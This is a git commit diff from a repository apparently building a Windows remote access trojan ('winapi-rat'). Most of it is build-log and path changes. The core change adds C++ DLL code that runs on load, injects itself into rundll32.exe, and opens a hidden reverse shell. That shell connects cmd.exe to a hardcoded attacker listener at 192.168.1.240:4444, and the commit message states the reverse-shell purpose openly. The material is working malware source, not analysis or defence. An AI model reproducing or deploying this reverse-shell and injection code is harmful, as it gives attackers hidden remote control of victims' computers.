Improved some stuff, cleaned some stuff. Now after executing loader the dll creates a reverse shell to a specified server.
This commit is contained in:
@@ -1,13 +0,0 @@
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
|
||||
c:\users\hellisabove\source\repos\rat\debug\dll.lib
|
||||
c:\users\hellisabove\source\repos\rat\debug\dll.exp
|
||||
c:\users\hellisabove\source\repos\rat\debug\dll.dll
|
||||
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
|
||||
+4
-5
@@ -1,10 +1,9 @@
|
||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
||||
fundll.cpp
|
||||
tools.cpp
|
||||
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
||||
Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
|
||||
Generating code
|
||||
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
|
||||
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||
Finished generating code
|
||||
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
|
||||
Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +0,0 @@
|
||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,16 +1,16 @@
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
|
||||
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
|
||||
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
|
||||
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
|
||||
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
|
||||
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
|
||||
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
|
||||
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
|
||||
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
|
||||
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
|
||||
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
|
||||
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
|
||||
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
|
||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
||||
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+42
-25
@@ -1,42 +1,59 @@
|
||||
#include <winsock2.h>
|
||||
#include <stdio.h>
|
||||
#include "tools.h"
|
||||
BOOL was_dllmain_called = FALSE;
|
||||
DWORD dll_param;
|
||||
#pragma comment(lib, "ws2_32")
|
||||
|
||||
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
|
||||
int reverse(void) {
|
||||
WSADATA wsaData;
|
||||
SOCKET wSock;
|
||||
struct sockaddr_in sock;
|
||||
STARTUPINFO si;
|
||||
PROCESS_INFORMATION pi;
|
||||
|
||||
// listener ip, port on attacker's machine
|
||||
char* ip = "192.168.1.240";
|
||||
short port = 4444;
|
||||
|
||||
// init socket lib
|
||||
WSAStartup(MAKEWORD(2, 2), &wsaData);
|
||||
|
||||
// create socket
|
||||
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
||||
|
||||
sock.sin_family = AF_INET;
|
||||
sock.sin_port = htons(port);
|
||||
sock.sin_addr.s_addr = inet_addr(ip);
|
||||
|
||||
// connect to remote host
|
||||
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
|
||||
|
||||
memset(&si, 0, sizeof(si));
|
||||
si.cb = sizeof(si);
|
||||
si.dwFlags = STARTF_USESTDHANDLES;
|
||||
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
|
||||
|
||||
// start cmd.exe with redirected streams
|
||||
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
extern "C" __declspec(dllexport) void FunEntry() {
|
||||
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
|
||||
DWORD dll_param;
|
||||
char dll_path[MAX_PATH];
|
||||
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
|
||||
char test[1024];
|
||||
wsprintfA(test, "%s", dll_path);
|
||||
MessageBoxA(0, test, "", 0);
|
||||
// inject dll
|
||||
reverse();
|
||||
Tools::AutoInject(target_path, dll_path);
|
||||
}
|
||||
|
||||
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
||||
dll_param = (DWORD)Base;
|
||||
was_dllmain_called = TRUE;
|
||||
|
||||
switch (Callback) {
|
||||
case DLL_PROCESS_ATTACH:
|
||||
|
||||
break;
|
||||
FunEntry();
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
extern "C" __declspec(dllexport) void MainBitch() {
|
||||
if (was_dllmain_called) {
|
||||
while (TRUE) {
|
||||
char exe[MAX_PATH + 1];
|
||||
GetModuleFileNameA(0, exe, sizeof(exe));
|
||||
MessageBoxA(0, exe, "I am inside: ", 0);
|
||||
}
|
||||
} else {
|
||||
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
|
||||
}
|
||||
}
|
||||
@@ -1,5 +1,4 @@
|
||||
#include <Windows.h>
|
||||
|
||||
#pragma once
|
||||
|
||||
namespace Tools {
|
||||
|
||||
Reference in New Issue
Block a user